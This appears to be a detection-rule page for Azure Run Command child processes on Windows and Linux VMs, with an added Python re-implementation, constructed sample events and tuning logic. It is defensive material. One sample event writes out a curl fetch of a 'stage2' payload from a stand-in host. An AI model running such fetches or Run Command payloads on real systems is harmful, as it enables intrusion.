
Azure Run Command Script Child Process

Elastic Detection Rules

Summary
Identifies Windows and Linux endpoint process-start events whose parent process matches Azure Run Command execution patterns. On Windows, Run Command typically launches PowerShell with -ExecutionPolicy Unrestricted and a script?.ps1 file; on Linux, the Azure Linux Agent (waagent) executes a downloaded script.sh under /var/lib/waagent/run-command/. The rule inspects parent process fields (name, command_line, args) to surface on-guest payload activity that cloud activity logs do not fully describe: the Azure control plane records that Run Command was invoked, while only the endpoint records what the delivered script actually spawned.

The rule correlates with Azure Run Command actions and maps to the MITRE ATT&CK techniques Command and Scripting Interpreter (PowerShell and Unix Shell) and Cloud Administration Command. It is backed by endpoint process data and Windows Sysmon operational logs and is intended to detect abuse or misuse of Run Command on Azure VMs.

False positives include legitimate automation or extension deployments that use the same parent/script patterns; tune against a baseline of hosts expected to receive Run Command and against known deployment windows rather than excluding the pattern outright.

Recommended response: validate the Azure RBAC assignments that permitted the invocation, revoke compromised credentials, isolate the guest, and collect both endpoint and Azure activity artifacts for incident reporting.
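The matching and tuning logic described above, as an added example that is not part of the Elastic rule or this page: the real rule is written in Elastic's query language, and this Python re-implements the same conditions over constructed ECS-style process-start events so they can be run offline. Assumptions the page does not state: the Windows parent is checked as powershell.exe only, the ? in script?.ps1 is treated as a single-character wildcard, the Linux check uses only the /var/lib/waagent/run-command/ prefix plus the script.sh basename (the sub-directory layout is not given), and all host names, file paths and the deployment window in the sample are invented.

```python
from __future__ import annotations

import fnmatch
import posixpath
from dataclasses import dataclass
from datetime import datetime, timedelta

# Directory the page names for Linux Run Command scripts. Only this prefix and
# the script.sh basename are checked; the layout below it is an assumption.
RUN_COMMAND_LINUX_DIR = "/var/lib/waagent/run-command/"


@dataclass(frozen=True)
class ProcessStart:
    """Minimal ECS-style process-start event: only the fields the rule reads."""
    host: str
    os_type: str                  # "windows" or "linux"
    timestamp: datetime
    parent_name: str
    parent_args: tuple[str, ...]
    name: str                     # child process name
    args: tuple[str, ...]

    @property
    def parent_command_line(self) -> str:
        return " ".join(self.parent_args)


def windows_run_command_parent(ev: ProcessStart) -> bool:
    """Parent is powershell.exe -ExecutionPolicy Unrestricted ... script?.ps1 (assumed shape)."""
    if ev.os_type != "windows" or ev.parent_name.lower() != "powershell.exe":
        return False
    args = [a.lower() for a in ev.parent_args]
    policy = any(a == "-executionpolicy" and args[i + 1] == "unrestricted"
                 for i, a in enumerate(args[:-1]))
    # '?' is a one-character wildcard: script1.ps1 matches, script12.ps1 does not.
    script = any(fnmatch.fnmatchcase(a.replace("\\", "/").rsplit("/", 1)[-1], "script?.ps1")
                 for a in args)
    return policy and script


def linux_run_command_parent(ev: ProcessStart) -> bool:
    """Parent runs a script.sh located under the waagent run-command directory."""
    if ev.os_type != "linux":
        return False
    for a in ev.parent_args:
        if not a.startswith("/"):
            continue
        # Normalise first so '..' segments cannot dodge (or fake) the prefix check.
        path = posixpath.normpath(a)
        if path.startswith(RUN_COMMAND_LINUX_DIR) and posixpath.basename(path) == "script.sh":
            return True
    return False


@dataclass(frozen=True)
class Alert:
    host: str
    os_type: str
    child: str
    parent_command_line: str


def evaluate(events, baseline_hosts=frozenset(), deployment_windows=()):
    """One Alert per matching event, minus expected automation on baseline hosts in a window."""
    alerts = []
    for ev in events:
        if not (windows_run_command_parent(ev) or linux_run_command_parent(ev)):
            continue
        in_window = any(start <= ev.timestamp <= end for start, end in deployment_windows)
        if ev.host in baseline_hosts and in_window:
            continue  # tuning from the page: baseline host inside a known deployment window
        alerts.append(Alert(ev.host, ev.os_type, ev.name, ev.parent_command_line))
    return alerts


# Constructed sample data, not real telemetry; the Windows path is hypothetical.
T0 = datetime(2026, 5, 20, 12, 0, 0)
WIN_SCRIPT = "C:\\Packages\\Plugins\\RunCommandWindows\\Downloads\\script1.ps1"


def sample_events() -> list[ProcessStart]:
    ps = ("powershell.exe", "-ExecutionPolicy", "Unrestricted", "-File", WIN_SCRIPT)
    return [
        # Run Command payload on Windows spawning whoami: should alert.
        ProcessStart("vm-win-01", "windows", T0, "powershell.exe", ps, "whoami.exe", ("whoami.exe",)),
        # Run Command payload on Linux fetching a second stage: should alert.
        ProcessStart("vm-lin-01", "linux", T0, "bash",
                     ("bash", "/var/lib/waagent/run-command/download/0/script.sh"),
                     "curl", ("curl", "-s", "https://example.invalid/stage2")),
        # Admin PowerShell with -ExecutionPolicy Bypass and no script?.ps1: no alert.
        ProcessStart("vm-win-02", "windows", T0, "powershell.exe",
                     ("powershell.exe", "-ExecutionPolicy", "Bypass", "-File", "C:\\ops\\deploy.ps1"),
                     "msiexec.exe", ("msiexec.exe", "/i", "agent.msi")),
        # waagent script outside run-command/: no alert.
        ProcessStart("vm-lin-02", "linux", T0, "bash",
                     ("bash", "/var/lib/waagent/custom-script/download/0/script.sh"),
                     "apt-get", ("apt-get", "update")),
        # Same Windows pattern on a baseline host inside the deployment window: suppressed.
        ProcessStart("vm-win-build", "windows", T0 + timedelta(minutes=5), "powershell.exe", ps,
                     "msbuild.exe", ("msbuild.exe",)),
    ]


def run_sample() -> list[Alert]:
    window = (T0 - timedelta(hours=1), T0 + timedelta(hours=1))
    return evaluate(sample_events(), baseline_hosts=frozenset({"vm-win-build"}),
                    deployment_windows=[window])
```

Running run_sample() yields alerts for vm-win-01 and vm-lin-01 only. The baseline-host suppression is deliberately two-factor (host and time window) so that the same pattern on a build host outside its deployment window still alerts; and the Linux check normalises the path before the prefix test, because a raw string comparison on the parent command line is the kind of check a path with embedded .. segments can slip past.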
Categories
  • Endpoint
  • Windows
  • Linux
  • Cloud
  • Azure
Data Sources
  • Process
ATT&CK Techniques
  • T1059
  • T1059.001
  • T1059.004
  • T1651
Created: 2026-05-20